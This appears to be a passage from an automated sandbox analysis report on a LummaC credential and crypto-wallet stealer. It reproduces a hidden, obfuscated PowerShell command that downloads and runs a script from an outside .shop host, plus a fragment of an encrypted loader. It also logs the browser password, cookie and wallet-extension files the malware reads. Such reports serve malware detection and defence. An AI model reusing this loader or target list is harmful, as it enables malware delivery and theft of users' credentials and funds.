kowp('9e334b36da65fc4cd88fd0d54c1c22fbf8dc3b04bea415ee8d3a4d1484b0406150b7ff1c184327b495dc49163e68ae0670ba32d22b53f3d21dccdda39fd3253fed91de2b3f77e4037b055f4b3412d5ccdc3a1b39789f06f7930dc4a07956fa68eca8e2f6499d93177d1921ae2418cb2699ec6c80e7279a8abd6a9a4d7e3fe3e8dbe4570e1f55a43d6d4c508fa56991f95689680af64b5262a41d3d94c5f57cfa20aeb1a08ff2bf17b5dacb4212c70dab809fdb5cbe0fb22347ae8ac80dfc19be9c5ba8e9936657f3587dc5a7c1b93b8b5b8928d6f42dffa7e01fdf4e34c895c6039aa5aad3d62f3554cf79ffd5e8d7a01a4ee09aff55f72c99249d32b683a307373ee57bf7dabb7b643375c84a3675780a53350109bb137cd9b3151e1862197a092a63d6891d60c45b0e08870aca193a7ae7a69f71d5319d1c5591c30f1eb14bf2e8cac0c0aa47b1cf263341221208edd70adc782580aef182c6ede0ac0c8846ba02132ccc59fe2fba0af85cc83a92b444e34d299ce4bb78d2e67097531997b9c398afa59a05087ad10cb8fccd64b089cb7e1d9448a06e5451b7e1fad3cd11656ce7d71529fc0aeeec74a57c9b8ada400e5bb14d609b2a4d2c9887a949a351792f6daad814bcef8c2537ea18295dbf31bebe4d1bfa7bbe02dadaccfc47444eb2b533f4a699b7865c05848bb784791abdba2f36a897be319943b5c85f80d1b9901f0ffc37613068553b99ee84836a56cb1f70957317e3a43f3d9ebbbe18feeee52ce041029ab9ae45a4c86f910a6ddf5765b4bdb03cb85481ddc8c8212a1f1f92b468be8cb5336e24ed88c9ec8a01cd4f72de404497dbb43a1c6a3822034f15f5f613ef5ad780b9692707bab44fb088a6061592c44b022a6d2a450c99c283117c8de80e765c31e70308152e59458e6fd3a65543c1ec931ac1a324732f6d1faac4abd5f572332947d1cb4967831073016e5efaef616f9317b004a73fffa3bb2982e91cbdec269fef3ef96395f94be96d5496bdf35e25a6638e2e25097db07c73c3edd7402bed8fc500882da3aaffc8d06fd1bdde8708df8df844f0ddceccaa22d16bab70d3b7d5e264b1ae1584137dd7bda7005c6f39d6c9271a903bb3663e0edf514bf4a8d05593db9b5ddfc4556bac017ae2de8428ea44a76d6e9afc522c9004ed9c593141666a52943ad448960d2c7623e6c4af33f5bad89705b716c876ae63e40d381b88ebeeb6363614481cfb2012acabc9c09e6d61b30149f2e4fa7380a70464224bec1abe9475dbd5b97fcf0278165f21fb815ff60146030497a1ac45d69ca7553003c733f00f0973a5fd787f2e4dec6f22a0bd2b2f6f882afafcfc5c903fb6aaedd7f994e291239b6b7d06cf6df234fb061934125997ffac95d4511365a41a1a1a2b19410abb92ee5511d9acb16adbbcfe5b0c2a4cf6c8b8cd6f6e0e9fdf7232373370c3cb4477d9d543073daf28d5809ad15346e15e3e789993ef8d9b807067bf4f550783802415488f744831f04feef6925abc1b6b107b1002ff450b386d584c659f07eb9483654ca1f5116547b9383d4f85cd91ce2d9f6088d2ce491512578016e54a41fae48b2708f2ab1fa5c98f21304571169f6900a36e6ab306adb4533f862332fe99dca4cc3c773200966c0661e34a4320c65cf06429fcf2c90f24ece6ed646948a6b8ccc0b81784faffc3007767bbc247c0a4fd247054540d44a8f8f303c529528c742475550e80ff0a5ce818cf6a23675e50f990211be6a6dc6d729cc913740aee1a9cde15b4f8d33d82ca43b137e9b62f21e5fc4638a978553bec16e68b51442628a7b1b7cd74d29750eea98b02dce0dc70288eaa41730bdd489c393e565891b9e2c52fe9e6a9704f6ff74b93abf9307ea0d851bcdf290e0a8461d19516abb02c61c6cbe1e1c259');$ajig=-join [char[]](([security.cryptography.aes	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -;set-variable ciu (.$executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name)\|member\|where-object{$_.name-like'tomd'}).name).invoke($executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name).psobject.methods\|where-object{$_.name-like'ome'}).name).invoke('n-o',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://cc.klipjaqemiu.shop/web.png';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value\|member)\|where-object{$_.name-like'nlg'}).name).invoke((variable lw).value)).invokereturnasis()	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: powershell.exe, 00000009.00000002.2885773089.0000000003607000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: powershell.exe, 00000002.00000002.1708208016.00000000070B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
